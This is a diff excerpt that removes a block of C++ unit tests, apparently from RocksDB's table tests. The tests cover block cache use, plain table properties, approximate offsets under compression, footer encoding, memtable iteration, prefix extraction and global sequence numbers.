-  c.Add("k04", std::string(200000, 'x'));
-  c.Add("k05", std::string(300000, 'x'));
-  c.Add("k06", "hello3");
-  c.Add("k07", std::string(100000, 'x'));
-  std::vector<std::string> keys;
-  stl_wrappers::KVMap kvmap;
-  const ImmutableCFOptions ioptions(opt);
-  c.Finish(opt, ioptions, table_options, *ikc, &keys, &kvmap);
-
-  unique_ptr<InternalIterator> iter(c.NewIterator());
-  iter->SeekToFirst();
-  while (iter->Valid()) {
-    iter->key();
-    iter->value();
-    iter->Next();
-  }
-  ASSERT_OK(iter->status());
-
-  const ImmutableCFOptions ioptions1(opt);
-  ASSERT_OK(c.Reopen(ioptions1));
-  auto table_reader = dynamic_cast<BlockBasedTable*>(c.GetTableReader());
-  for (const std::string& key : keys) {
-    ASSERT_TRUE(table_reader->TEST_KeyInCache(ReadOptions(), key));
-  }
-  c.ResetTableReader();
-
-  // rerun with different block cache
-  table_options.block_cache = NewLRUCache(16 * 1024 * 1024, 4);
-  opt.table_factory.reset(NewBlockBasedTableFactory(table_options));
-  const ImmutableCFOptions ioptions2(opt);
-  ASSERT_OK(c.Reopen(ioptions2));
-  table_reader = dynamic_cast<BlockBasedTable*>(c.GetTableReader());
-  for (const std::string& key : keys) {
-    ASSERT_TRUE(!table_reader->TEST_KeyInCache(ReadOptions(), key));
-  }
-  c.ResetTableReader();
-}
-
-TEST_F(BlockBasedTableTest, NewIndexIteratorLeak) {
-  // A regression test to avoid data race described in
-  // https://github.com/facebook/rocksdb/issues/1267
-  TableConstructor c(BytewiseComparator(), true /* convert_to_internal_key_ */);
-  std::vector<std::string> keys;
-  stl_wrappers::KVMap kvmap;
-  c.Add("a1", "val1");
-  Options options;
-  options.prefix_extractor.reset(NewFixedPrefixTransform(1));
-  BlockBasedTableOptions table_options;
-  table_options.index_type = BlockBasedTableOptions::kHashSearch;
-  table_options.cache_index_and_filter_blocks = true;
-  table_options.block_cache = NewLRUCache(0);
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-  const ImmutableCFOptions ioptions(options);
-  c.Finish(options, ioptions, table_options,
-           GetPlainInternalComparator(options.comparator), &keys, &kvmap);
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependencyAndMarkers(
-      {
-          {"BlockBasedTable::NewIndexIterator::thread1:1",
-           "BlockBasedTable::NewIndexIterator::thread2:2"},
-          {"BlockBasedTable::NewIndexIterator::thread2:3",
-           "BlockBasedTable::NewIndexIterator::thread1:4"},
-      },
-      {
-          {"BlockBasedTableTest::NewIndexIteratorLeak:Thread1Marker",
-           "BlockBasedTable::NewIndexIterator::thread1:1"},
-          {"BlockBasedTableTest::NewIndexIteratorLeak:Thread1Marker",
-           "BlockBasedTable::NewIndexIterator::thread1:4"},
-          {"BlockBasedTableTest::NewIndexIteratorLeak:Thread2Marker",
-           "BlockBasedTable::NewIndexIterator::thread2:2"},
-          {"BlockBasedTableTest::NewIndexIteratorLeak:Thread2Marker",
-           "BlockBasedTable::NewIndexIterator::thread2:3"},
-      });
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  ReadOptions ro;
-  auto* reader = c.GetTableReader();
-
-  std::function<void()> func1 = [&]() {
-    TEST_SYNC_POINT("BlockBasedTableTest::NewIndexIteratorLeak:Thread1Marker");
-    std::unique_ptr<InternalIterator> iter(reader->NewIterator(ro));
-    iter->Seek(InternalKey("a1", 0, kTypeValue).Encode());
-  };
-
-  std::function<void()> func2 = [&]() {
-    TEST_SYNC_POINT("BlockBasedTableTest::NewIndexIteratorLeak:Thread2Marker");
-    std::unique_ptr<InternalIterator> iter(reader->NewIterator(ro));
-  };
-
-  auto thread1 = port::Thread(func1);
-  auto thread2 = port::Thread(func2);
-  thread1.join();
-  thread2.join();
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  c.ResetTableReader();
-}
-
-// Plain table is not supported in ROCKSDB_LITE
-#ifndef ROCKSDB_LITE
-TEST_F(PlainTableTest, BasicPlainTableProperties) {
-  PlainTableOptions plain_table_options;
-  plain_table_options.user_key_len = 8;
-  plain_table_options.bloom_bits_per_key = 8;
-  plain_table_options.hash_table_ratio = 0;
-
-  PlainTableFactory factory(plain_table_options);
-  test::StringSink sink;
-  unique_ptr<WritableFileWriter> file_writer(
-      test::GetWritableFileWriter(new test::StringSink()));
-  Options options;
-  const ImmutableCFOptions ioptions(options);
-  InternalKeyComparator ikc(options.comparator);
-  std::vector<std::unique_ptr<IntTblPropCollectorFactory>>
-      int_tbl_prop_collector_factories;
-  std::string column_family_name;
-  int unknown_level = -1;
-  std::unique_ptr<TableBuilder> builder(factory.NewTableBuilder(
-      TableBuilderOptions(ioptions, ikc, &int_tbl_prop_collector_factories,
-                          kNoCompression, CompressionOptions(),
-                          nullptr /* compression_dict */,
-                          false /* skip_filters */, column_family_name,
-                          unknown_level),
-      TablePropertiesCollectorFactory::Context::kUnknownColumnFamily,
-      file_writer.get()));
-
-  for (char c = 'a'; c <= 'z'; ++c) {
-    std::string key(8, c);
-    key.append("\1       ");  // PlainTable expects internal key structure
-    std::string value(28, c + 42);
-    builder->Add(key, value);
-  }
-  ASSERT_OK(builder->Finish());
-  file_writer->Flush();
-
-  test::StringSink* ss =
-    static_cast<test::StringSink*>(file_writer->writable_file());
-  unique_ptr<RandomAccessFileReader> file_reader(
-      test::GetRandomAccessFileReader(
-          new test::StringSource(ss->contents(), 72242, true)));
-
-  TableProperties* props = nullptr;
-  auto s = ReadTableProperties(file_reader.get(), ss->contents().size(),
-                               kPlainTableMagicNumber, ioptions,
-                               &props);
-  std::unique_ptr<TableProperties> props_guard(props);
-  ASSERT_OK(s);
-
-  ASSERT_EQ(0ul, props->index_size);
-  ASSERT_EQ(0ul, props->filter_size);
-  ASSERT_EQ(16ul * 26, props->raw_key_size);
-  ASSERT_EQ(28ul * 26, props->raw_value_size);
-  ASSERT_EQ(26ul, props->num_entries);
-  ASSERT_EQ(1ul, props->num_data_blocks);
-}
-#endif  // !ROCKSDB_LITE
-
-TEST_F(GeneralTableTest, ApproximateOffsetOfPlain) {
-  TableConstructor c(BytewiseComparator(), true /* convert_to_internal_key_ */);
-  c.Add("k01", "hello");
-  c.Add("k02", "hello2");
-  c.Add("k03", std::string(10000, 'x'));
-  c.Add("k04", std::string(200000, 'x'));
-  c.Add("k05", std::string(300000, 'x'));
-  c.Add("k06", "hello3");
-  c.Add("k07", std::string(100000, 'x'));
-  std::vector<std::string> keys;
-  stl_wrappers::KVMap kvmap;
-  Options options;
-  test::PlainInternalKeyComparator internal_comparator(options.comparator);
-  options.compression = kNoCompression;
-  BlockBasedTableOptions table_options;
-  table_options.block_size = 1024;
-  const ImmutableCFOptions ioptions(options);
-  c.Finish(options, ioptions, table_options, internal_comparator,
-           &keys, &kvmap);
-
-  ASSERT_TRUE(Between(c.ApproximateOffsetOf("abc"),       0,      0));
-  ASSERT_TRUE(Between(c.ApproximateOffsetOf("k01"),       0,      0));
-  ASSERT_TRUE(Between(c.ApproximateOffsetOf("k01a"),      0,      0));
-  ASSERT_TRUE(Between(c.ApproximateOffsetOf("k02"),       0,      0));
-  ASSERT_TRUE(Between(c.ApproximateOffsetOf("k03"),       0,      0));
-  ASSERT_TRUE(Between(c.ApproximateOffsetOf("k04"),   10000,  11000));
-  // k04 and k05 will be in two consecutive blocks, the index is
-  // an arbitrary slice between k04 and k05, either before or after k04a
-  ASSERT_TRUE(Between(c.ApproximateOffsetOf("k04a"), 10000, 211000));
-  ASSERT_TRUE(Between(c.ApproximateOffsetOf("k05"),  210000, 211000));
-  ASSERT_TRUE(Between(c.ApproximateOffsetOf("k06"),  510000, 511000));
-  ASSERT_TRUE(Between(c.ApproximateOffsetOf("k07"),  510000, 511000));
-  ASSERT_TRUE(Between(c.ApproximateOffsetOf("xyz"),  610000, 612000));
-  c.ResetTableReader();
-}
-
-static void DoCompressionTest(CompressionType comp) {
-  Random rnd(301);
-  TableConstructor c(BytewiseComparator(), true /* convert_to_internal_key_ */);
-  std::string tmp;
-  c.Add("k01", "hello");
-  c.Add("k02", test::CompressibleString(&rnd, 0.25, 10000, &tmp));
-  c.Add("k03", "hello3");
-  c.Add("k04", test::CompressibleString(&rnd, 0.25, 10000, &tmp));
-  std::vector<std::string> keys;
-  stl_wrappers::KVMap kvmap;
-  Options options;
-  test::PlainInternalKeyComparator ikc(options.comparator);
-  options.compression = comp;
-  BlockBasedTableOptions table_options;
-  table_options.block_size = 1024;
-  const ImmutableCFOptions ioptions(options);
-  c.Finish(options, ioptions, table_options, ikc, &keys, &kvmap);
-
-  ASSERT_TRUE(Between(c.ApproximateOffsetOf("abc"),       0,      0));
-  ASSERT_TRUE(Between(c.ApproximateOffsetOf("k01"),       0,      0));
-  ASSERT_TRUE(Between(c.ApproximateOffsetOf("k02"),       0,      0));
-  ASSERT_TRUE(Between(c.ApproximateOffsetOf("k03"),    2000,   3000));
-  ASSERT_TRUE(Between(c.ApproximateOffsetOf("k04"),    2000,   3000));
-  ASSERT_TRUE(Between(c.ApproximateOffsetOf("xyz"),    4000,   6100));
-  c.ResetTableReader();
-}
-
-TEST_F(GeneralTableTest, ApproximateOffsetOfCompressed) {
-  std::vector<CompressionType> compression_state;
-  if (!Snappy_Supported()) {
-    fprintf(stderr, "skipping snappy compression tests\n");
-  } else {
-    compression_state.push_back(kSnappyCompression);
-  }
-
-  if (!Zlib_Supported()) {
-    fprintf(stderr, "skipping zlib compression tests\n");
-  } else {
-    compression_state.push_back(kZlibCompression);
-  }
-
-  // TODO(kailiu) DoCompressionTest() doesn't work with BZip2.
-  /*
-  if (!BZip2_Supported()) {
-    fprintf(stderr, "skipping bzip2 compression tests\n");
-  } else {
-    compression_state.push_back(kBZip2Compression);
-  }
-  */
-
-  if (!LZ4_Supported()) {
-    fprintf(stderr, "skipping lz4 and lz4hc compression tests\n");
-  } else {
-    compression_state.push_back(kLZ4Compression);
-    compression_state.push_back(kLZ4HCCompression);
-  }
-
-  if (!XPRESS_Supported()) {
-    fprintf(stderr, "skipping xpress and xpress compression tests\n");
-  }
-  else {
-    compression_state.push_back(kXpressCompression);
-  }
-
-  for (auto state : compression_state) {
-    DoCompressionTest(state);
-  }
-}
-
-TEST_F(HarnessTest, Randomized) {
-  std::vector<TestArgs> args = GenerateArgList();
-  for (unsigned int i = 0; i < args.size(); i++) {
-    Init(args[i]);
-    Random rnd(test::RandomSeed() + 5);
-    for (int num_entries = 0; num_entries < 2000;
-         num_entries += (num_entries < 50 ? 1 : 200)) {
-      if ((num_entries % 10) == 0) {
-        fprintf(stderr, "case %d of %d: num_entries = %d\n", (i + 1),
-                static_cast<int>(args.size()), num_entries);
-      }
-      for (int e = 0; e < num_entries; e++) {
-        std::string v;
-        Add(test::RandomKey(&rnd, rnd.Skewed(4)),
-            test::RandomString(&rnd, rnd.Skewed(5), &v).ToString());
-      }
-      Test(&rnd);
-    }
-  }
-}
-
-#ifndef ROCKSDB_LITE
-TEST_F(HarnessTest, RandomizedLongDB) {
-  Random rnd(test::RandomSeed());
-  TestArgs args = {DB_TEST, false, 16, kNoCompression, 0, false};
-  Init(args);
-  int num_entries = 100000;
-  for (int e = 0; e < num_entries; e++) {
-    std::string v;
-    Add(test::RandomKey(&rnd, rnd.Skewed(4)),
-        test::RandomString(&rnd, rnd.Skewed(5), &v).ToString());
-  }
-  Test(&rnd);
-
-  // We must have created enough data to force merging
-  int files = 0;
-  for (int level = 0; level < db()->NumberLevels(); level++) {
-    std::string value;
-    char name[100];
-    snprintf(name, sizeof(name), "rocksdb.num-files-at-level%d", level);
-    ASSERT_TRUE(db()->GetProperty(name, &value));
-    files += atoi(value.c_str());
-  }
-  ASSERT_GT(files, 0);
-}
-#endif  // ROCKSDB_LITE
-
-class MemTableTest : public testing::Test {};
-
-TEST_F(MemTableTest, Simple) {
-  InternalKeyComparator cmp(BytewiseComparator());
-  auto table_factory = std::make_shared<SkipListFactory>();
-  Options options;
-  options.memtable_factory = table_factory;
-  ImmutableCFOptions ioptions(options);
-  WriteBufferManager wb(options.db_write_buffer_size);
-  MemTable* memtable =
-      new MemTable(cmp, ioptions, MutableCFOptions(options), &wb,
-                   kMaxSequenceNumber, 0 /* column_family_id */);
-  memtable->Ref();
-  WriteBatch batch;
-  WriteBatchInternal::SetSequence(&batch, 100);
-  batch.Put(std::string("k1"), std::string("v1"));
-  batch.Put(std::string("k2"), std::string("v2"));
-  batch.Put(std::string("k3"), std::string("v3"));
-  batch.Put(std::string("largekey"), std::string("vlarge"));
-  batch.DeleteRange(std::string("chi"), std::string("xigua"));
-  batch.DeleteRange(std::string("begin"), std::string("end"));
-  ColumnFamilyMemTablesDefault cf_mems_default(memtable);
-  ASSERT_TRUE(
-      WriteBatchInternal::InsertInto(&batch, &cf_mems_default, nullptr).ok());
-
-  for (int i = 0; i < 2; ++i) {
-    Arena arena;
-    ScopedArenaIterator arena_iter_guard;
-    std::unique_ptr<InternalIterator> iter_guard;
-    InternalIterator* iter;
-    if (i == 0) {
-      iter = memtable->NewIterator(ReadOptions(), &arena);
-      arena_iter_guard.set(iter);
-    } else {
-      iter = memtable->NewRangeTombstoneIterator(ReadOptions());
-      iter_guard.reset(iter);
-    }
-    if (iter == nullptr) {
-      continue;
-    }
-    iter->SeekToFirst();
-    while (iter->Valid()) {
-      fprintf(stderr, "key: '%s' -> '%s'\n", iter->key().ToString().c_str(),
-              iter->value().ToString().c_str());
-      iter->Next();
-    }
-  }
-
-  delete memtable->Unref();
-}
-
-// Test the empty key
-TEST_F(HarnessTest, SimpleEmptyKey) {
-  auto args = GenerateArgList();
-  for (const auto& arg : args) {
-    Init(arg);
-    Random rnd(test::RandomSeed() + 1);
-    Add("", "v");
-    Test(&rnd);
-  }
-}
-
-TEST_F(HarnessTest, SimpleSingle) {
-  auto args = GenerateArgList();
-  for (const auto& arg : args) {
-    Init(arg);
-    Random rnd(test::RandomSeed() + 2);
-    Add("abc", "v");
-    Test(&rnd);
-  }
-}
-
-TEST_F(HarnessTest, SimpleMulti) {
-  auto args = GenerateArgList();
-  for (const auto& arg : args) {
-    Init(arg);
-    Random rnd(test::RandomSeed() + 3);
-    Add("abc", "v");
-    Add("abcd", "v");
-    Add("ac", "v2");
-    Test(&rnd);
-  }
-}
-
-TEST_F(HarnessTest, SimpleSpecialKey) {
-  auto args = GenerateArgList();
-  for (const auto& arg : args) {
-    Init(arg);
-    Random rnd(test::RandomSeed() + 4);
-    Add("\xff\xff", "v3");
-    Test(&rnd);
-  }
-}
-
-TEST_F(HarnessTest, FooterTests) {
-  {
-    // upconvert legacy block based
-    std::string encoded;
-    Footer footer(kLegacyBlockBasedTableMagicNumber, 0);
-    BlockHandle meta_index(10, 5), index(20, 15);
-    footer.set_metaindex_handle(meta_index);
-    footer.set_index_handle(index);
-    footer.EncodeTo(&encoded);
-    Footer decoded_footer;
-    Slice encoded_slice(encoded);
-    decoded_footer.DecodeFrom(&encoded_slice);
-    ASSERT_EQ(decoded_footer.table_magic_number(), kBlockBasedTableMagicNumber);
-    ASSERT_EQ(decoded_footer.checksum(), kCRC32c);
-    ASSERT_EQ(decoded_footer.metaindex_handle().offset(), meta_index.offset());
-    ASSERT_EQ(decoded_footer.metaindex_handle().size(), meta_index.size());
-    ASSERT_EQ(decoded_footer.index_handle().offset(), index.offset());
-    ASSERT_EQ(decoded_footer.index_handle().size(), index.size());
-    ASSERT_EQ(decoded_footer.version(), 0U);
-  }
-  {
-    // xxhash block based
-    std::string encoded;
-    Footer footer(kBlockBasedTableMagicNumber, 1);
-    BlockHandle meta_index(10, 5), index(20, 15);
-    footer.set_metaindex_handle(meta_index);
-    footer.set_index_handle(index);
-    footer.set_checksum(kxxHash);
-    footer.EncodeTo(&encoded);
-    Footer decoded_footer;
-    Slice encoded_slice(encoded);
-    decoded_footer.DecodeFrom(&encoded_slice);
-    ASSERT_EQ(decoded_footer.table_magic_number(), kBlockBasedTableMagicNumber);
-    ASSERT_EQ(decoded_footer.checksum(), kxxHash);
-    ASSERT_EQ(decoded_footer.metaindex_handle().offset(), meta_index.offset());
-    ASSERT_EQ(decoded_footer.metaindex_handle().size(), meta_index.size());
-    ASSERT_EQ(decoded_footer.index_handle().offset(), index.offset());
-    ASSERT_EQ(decoded_footer.index_handle().size(), index.size());
-    ASSERT_EQ(decoded_footer.version(), 1U);
-  }
-// Plain table is not supported in ROCKSDB_LITE
-#ifndef ROCKSDB_LITE
-  {
-    // upconvert legacy plain table
-    std::string encoded;
-    Footer footer(kLegacyPlainTableMagicNumber, 0);
-    BlockHandle meta_index(10, 5), index(20, 15);
-    footer.set_metaindex_handle(meta_index);
-    footer.set_index_handle(index);
-    footer.EncodeTo(&encoded);
-    Footer decoded_footer;
-    Slice encoded_slice(encoded);
-    decoded_footer.DecodeFrom(&encoded_slice);
-    ASSERT_EQ(decoded_footer.table_magic_number(), kPlainTableMagicNumber);
-    ASSERT_EQ(decoded_footer.checksum(), kCRC32c);
-    ASSERT_EQ(decoded_footer.metaindex_handle().offset(), meta_index.offset());
-    ASSERT_EQ(decoded_footer.metaindex_handle().size(), meta_index.size());
-    ASSERT_EQ(decoded_footer.index_handle().offset(), index.offset());
-    ASSERT_EQ(decoded_footer.index_handle().size(), index.size());
-    ASSERT_EQ(decoded_footer.version(), 0U);
-  }
-  {
-    // xxhash block based
-    std::string encoded;
-    Footer footer(kPlainTableMagicNumber, 1);
-    BlockHandle meta_index(10, 5), index(20, 15);
-    footer.set_metaindex_handle(meta_index);
-    footer.set_index_handle(index);
-    footer.set_checksum(kxxHash);
-    footer.EncodeTo(&encoded);
-    Footer decoded_footer;
-    Slice encoded_slice(encoded);
-    decoded_footer.DecodeFrom(&encoded_slice);
-    ASSERT_EQ(decoded_footer.table_magic_number(), kPlainTableMagicNumber);
-    ASSERT_EQ(decoded_footer.checksum(), kxxHash);
-    ASSERT_EQ(decoded_footer.metaindex_handle().offset(), meta_index.offset());
-    ASSERT_EQ(decoded_footer.metaindex_handle().size(), meta_index.size());
-    ASSERT_EQ(decoded_footer.index_handle().offset(), index.offset());
-    ASSERT_EQ(decoded_footer.index_handle().size(), index.size());
-    ASSERT_EQ(decoded_footer.version(), 1U);
-  }
-#endif  // !ROCKSDB_LITE
-  {
-    // version == 2
-    std::string encoded;
-    Footer footer(kBlockBasedTableMagicNumber, 2);
-    BlockHandle meta_index(10, 5), index(20, 15);
-    footer.set_metaindex_handle(meta_index);
-    footer.set_index_handle(index);
-    footer.EncodeTo(&encoded);
-    Footer decoded_footer;
-    Slice encoded_slice(encoded);
-    decoded_footer.DecodeFrom(&encoded_slice);
-    ASSERT_EQ(decoded_footer.table_magic_number(), kBlockBasedTableMagicNumber);
-    ASSERT_EQ(decoded_footer.checksum(), kCRC32c);
-    ASSERT_EQ(decoded_footer.metaindex_handle().offset(), meta_index.offset());
-    ASSERT_EQ(decoded_footer.metaindex_handle().size(), meta_index.size());
-    ASSERT_EQ(decoded_footer.index_handle().offset(), index.offset());
-    ASSERT_EQ(decoded_footer.index_handle().size(), index.size());
-    ASSERT_EQ(decoded_footer.version(), 2U);
-  }
-}
-
-class IndexBlockRestartIntervalTest
-    : public BlockBasedTableTest,
-      public ::testing::WithParamInterface<int> {
- public:
-  static std::vector<int> GetRestartValues() { return {-1, 0, 1, 8, 16, 32}; }
-};
-
-INSTANTIATE_TEST_CASE_P(
-    IndexBlockRestartIntervalTest, IndexBlockRestartIntervalTest,
-    ::testing::ValuesIn(IndexBlockRestartIntervalTest::GetRestartValues()));
-
-TEST_P(IndexBlockRestartIntervalTest, IndexBlockRestartInterval) {
-  const int kKeysInTable = 10000;
-  const int kKeySize = 100;
-  const int kValSize = 500;
-
-  int index_block_restart_interval = GetParam();
-
-  Options options;
-  BlockBasedTableOptions table_options;
-  table_options.block_size = 64;  // small block size to get big index block
-  table_options.index_block_restart_interval = index_block_restart_interval;
-  options.table_factory.reset(new BlockBasedTableFactory(table_options));
-
-  TableConstructor c(BytewiseComparator());
-  static Random rnd(301);
-  for (int i = 0; i < kKeysInTable; i++) {
-    InternalKey k(RandomString(&rnd, kKeySize), 0, kTypeValue);
-    c.Add(k.Encode().ToString(), RandomString(&rnd, kValSize));
-  }
-
-  std::vector<std::string> keys;
-  stl_wrappers::KVMap kvmap;
-  std::unique_ptr<InternalKeyComparator> comparator(
-      new InternalKeyComparator(BytewiseComparator()));
-  const ImmutableCFOptions ioptions(options);
-  c.Finish(options, ioptions, table_options, *comparator, &keys, &kvmap);
-  auto reader = c.GetTableReader();
-
-  std::unique_ptr<InternalIterator> db_iter(reader->NewIterator(ReadOptions()));
-
-  // Test point lookup
-  for (auto& kv : kvmap) {
-    db_iter->Seek(kv.first);
-
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_OK(db_iter->status());
-    ASSERT_EQ(db_iter->key(), kv.first);
-    ASSERT_EQ(db_iter->value(), kv.second);
-  }
-
-  // Test iterating
-  auto kv_iter = kvmap.begin();
-  for (db_iter->SeekToFirst(); db_iter->Valid(); db_iter->Next()) {
-    ASSERT_EQ(db_iter->key(), kv_iter->first);
-    ASSERT_EQ(db_iter->value(), kv_iter->second);
-    kv_iter++;
-  }
-  ASSERT_EQ(kv_iter, kvmap.end());
-  c.ResetTableReader();
-}
-
-class PrefixTest : public testing::Test {
- public:
-  PrefixTest() : testing::Test() {}
-  ~PrefixTest() {}
-};
-
-namespace {
-// A simple PrefixExtractor that only works for test PrefixAndWholeKeyTest
-class TestPrefixExtractor : public rocksdb::SliceTransform {
- public:
-  ~TestPrefixExtractor() override{};
-  const char* Name() const override { return "TestPrefixExtractor"; }
-
-  rocksdb::Slice Transform(const rocksdb::Slice& src) const override {
-    assert(IsValid(src));
-    return rocksdb::Slice(src.data(), 3);
-  }
-
-  bool InDomain(const rocksdb::Slice& src) const override {
-    assert(IsValid(src));
-    return true;
-  }
-
-  bool InRange(const rocksdb::Slice& dst) const override { return true; }
-
-  bool IsValid(const rocksdb::Slice& src) const {
-    if (src.size() != 4) {
-      return false;
-    }
-    if (src[0] != '[') {
-      return false;
-    }
-    if (src[1] < '0' || src[1] > '9') {
-      return false;
-    }
-    if (src[2] != ']') {
-      return false;
-    }
-    if (src[3] < '0' || src[3] > '9') {
-      return false;
-    }
-    return true;
-  }
-};
-}  // namespace
-
-TEST_F(PrefixTest, PrefixAndWholeKeyTest) {
-  rocksdb::Options options;
-  options.compaction_style = rocksdb::kCompactionStyleUniversal;
-  options.num_levels = 20;
-  options.create_if_missing = true;
-  options.optimize_filters_for_hits = false;
-  options.target_file_size_base = 268435456;
-  options.prefix_extractor = std::make_shared<TestPrefixExtractor>();
-  rocksdb::BlockBasedTableOptions bbto;
-  bbto.filter_policy.reset(rocksdb::NewBloomFilterPolicy(10));
-  bbto.block_size = 262144;
-  bbto.whole_key_filtering = true;
-
-  const std::string kDBPath = test::TmpDir() + "/table_prefix_test";
-  options.table_factory.reset(NewBlockBasedTableFactory(bbto));
-  DestroyDB(kDBPath, options);
-  rocksdb::DB* db;
-  ASSERT_OK(rocksdb::DB::Open(options, kDBPath, &db));
-
-  // Create a bunch of keys with 10 filters.
-  for (int i = 0; i < 10; i++) {
-    std::string prefix = "[" + std::to_string(i) + "]";
-    for (int j = 0; j < 10; j++) {
-      std::string key = prefix + std::to_string(j);
-      db->Put(rocksdb::WriteOptions(), key, "1");
-    }
-  }
-
-  // Trigger compaction.
-  db->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-  delete db;
-  // In the second round, turn whole_key_filtering off and expect
-  // rocksdb still works.
-}
-
-TEST_F(BlockBasedTableTest, TableWithGlobalSeqno) {
-  BlockBasedTableOptions bbto;
-  test::StringSink* sink = new test::StringSink();
-  unique_ptr<WritableFileWriter> file_writer(test::GetWritableFileWriter(sink));
-  Options options;
-  options.table_factory.reset(NewBlockBasedTableFactory(bbto));
-  const ImmutableCFOptions ioptions(options);
-  InternalKeyComparator ikc(options.comparator);
-  std::vector<std::unique_ptr<IntTblPropCollectorFactory>>
-      int_tbl_prop_collector_factories;
-  int_tbl_prop_collector_factories.emplace_back(
-      new SstFileWriterPropertiesCollectorFactory(2 /* version */,
-                                                  0 /* global_seqno*/));
-  std::string column_family_name;
-  std::unique_ptr<TableBuilder> builder(options.table_factory->NewTableBuilder(
-      TableBuilderOptions(ioptions, ikc, &int_tbl_prop_collector_factories,
-                          kNoCompression, CompressionOptions(),
-                          nullptr /* compression_dict */,
-                          false /* skip_filters */, column_family_name, -1),
-      TablePropertiesCollectorFactory::Context::kUnknownColumnFamily,
-      file_writer.get()));
-
-  for (char c = 'a'; c <= 'z'; ++c) {
-    std::string key(8, c);
-    std::string value = key;
-    InternalKey ik(key, 0, kTypeValue);
-
-    builder->Add(ik.Encode(), value);
-  }
-  ASSERT_OK(builder->Finish());
-  file_writer->Flush();
-
-  test::RandomRWStringSink ss_rw(sink);
-  uint32_t version;
-  uint64_t global_seqno;
-  uint64_t global_seqno_offset;
-
-  // Helper function to get version, global_seqno, global_seqno_offset
-  std::function<void()> GetVersionAndGlobalSeqno = [&]() {
-    unique_ptr<RandomAccessFileReader> file_reader(
-        test::GetRandomAccessFileReader(
-            new test::StringSource(ss_rw.contents(), 73342, true)));
-
-    TableProperties* props = nullptr;
-    ASSERT_OK(ReadTableProperties(file_reader.get(), ss_rw.contents().size(),
-                                  kBlockBasedTableMagicNumber, ioptions,
-                                  &props));
-
-    UserCollectedProperties user_props = props->user_collected_properties;
-    version = DecodeFixed32(
-        user_props[ExternalSstFilePropertyNames::kVersion].c_str());
-    global_seqno = DecodeFixed64(
-        user_props[ExternalSstFilePropertyNames::kGlobalSeqno].c_str());
-    global_seqno_offset =
-        props->properties_offsets[ExternalSstFilePropertyNames::kGlobalSeqno];
-
-    delete props;
-  };
-
-  // Helper function to update the value of the global seqno in the file
-  std::function<void(uint64_t)> SetGlobalSeqno = [&](uint64_t val) {
-    std::string new_global_seqno;
-    PutFixed64(&new_global_seqno, val);
-
-    ASSERT_OK(ss_rw.Write(global_seqno_offset, new_global_seqno));
-  };
-
-  // Helper function to get the contents of the table InternalIterator
-  unique_ptr<TableReader> table_reader;
-  std::function<InternalIterator*()> GetTableInternalIter = [&]() {
-    unique_ptr<RandomAccessFileReader> file_reader(
-        test::GetRandomAccessFileReader(
-            new test::StringSource(ss_rw.contents(), 73342, true)));
-
-    options.table_factory->NewTableReader(
-        TableReaderOptions(ioptions, EnvOptions(), ikc), std::move(file_reader),
-        ss_rw.contents().size(), &table_reader);
-
-    return table_reader->NewIterator(ReadOptions());
-  };
-
-  GetVersionAndGlobalSeqno();
-  ASSERT_EQ(2, version);
-  ASSERT_EQ(0, global_seqno);
-
-  InternalIterator* iter = GetTableInternalIter();
-  char current_c = 'a';
-  for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-    ParsedInternalKey pik;
-    ASSERT_TRUE(ParseInternalKey(iter->key(), &pik));
-
-    ASSERT_EQ(pik.type, ValueType::kTypeValue);
-    ASSERT_EQ(pik.sequence, 0);
-    ASSERT_EQ(pik.user_key, iter->value());
-    ASSERT_EQ(pik.user_key.ToString(), std::string(8, current_c));
-    current_c++;
-  }
-  ASSERT_EQ(current_c, 'z' + 1);
-  delete iter;
-
-  // Update global sequence number to 10
-  SetGlobalSeqno(10);
-  GetVersionAndGlobalSeqno();
-  ASSERT_EQ(2, version);
-  ASSERT_EQ(10, global_seqno);
-
-  iter = GetTableInternalIter();
-  current_c = 'a';
-  for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-    ParsedInternalKey pik;
-    ASSERT_TRUE(ParseInternalKey(iter->key(), &pik));
-
-    ASSERT_EQ(pik.type, ValueType::kTypeValue);
-    ASSERT_EQ(pik.sequence, 10);
-    ASSERT_EQ(pik.user_key, iter->value());
-    ASSERT_EQ(pik.user_key.ToString(), std::string(8, current_c));
-    current_c++;
-  }
-  ASSERT_EQ(current_c, 'z' + 1);
-
-  // Verify Seek
-  for (char c = 'a'; c <= 'z'; c++) {
-    std::string k = std::string(8, c);
-    InternalKey ik(k, 10, kValueTypeForSeek);
-    iter->Seek(ik.Encode());
-    ASSERT_TRUE(iter->Valid());
-
-    ParsedInternalKey pik;
-    ASSERT_TRUE(ParseInternalKey(iter->key(), &pik));
-
-    ASSERT_EQ(pik.type, ValueType::kTypeValue);
-    ASSERT_EQ(pik.sequence, 10);
-    ASSERT_EQ(pik.user_key.ToString(), k);
-    ASSERT_EQ(iter->value().ToString(), k);
-  }
-  delete iter;
-
-  // Update global sequence number to 3
-  SetGlobalSeqno(3);
-  GetVersionAndGlobalSeqno();
-  ASSERT_EQ(2, version);
-  ASSERT_EQ(3, global_seqno);
-
-  iter = GetTableInternalIter();
-  current_c = 'a';
-  for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-    ParsedInternalKey pik;
-    ASSERT_TRUE(ParseInternalKey(iter->key(), &pik));
-
-    ASSERT_EQ(pik.type, ValueType::kTypeValue);
-    ASSERT_EQ(pik.sequence, 3);
-    ASSERT_EQ(pik.user_key, iter->value());
-    ASSERT_EQ(pik.user_key.ToString(), std::string(8, current_c));
-    current_c++;
-  }
-  ASSERT_EQ(current_c, 'z' + 1);
-
-  // Verify Seek
-  for (char c = 'a'; c <= 'z'; c++) {
-    std::string k = std::string(8, c);
-    // seqno=4 is less than 3 so we still should get our key
-    InternalKey ik(k, 4, kValueTypeForSeek);
-    iter->Seek(ik.Encode());
-    ASSERT_TRUE(iter->Valid());
-
-    ParsedInternalKey pik;
-    ASSERT_TRUE(ParseInternalKey(iter->key(), &pik));
-
-    ASSERT_EQ(pik.type, ValueType::kTypeValue);
-    ASSERT_EQ(pik.sequence, 3);
-    ASSERT_EQ(pik.user_key.ToString(), k);
-    ASSERT_EQ(iter->value().ToString(), k);
-  }
-
-  delete iter;
-}
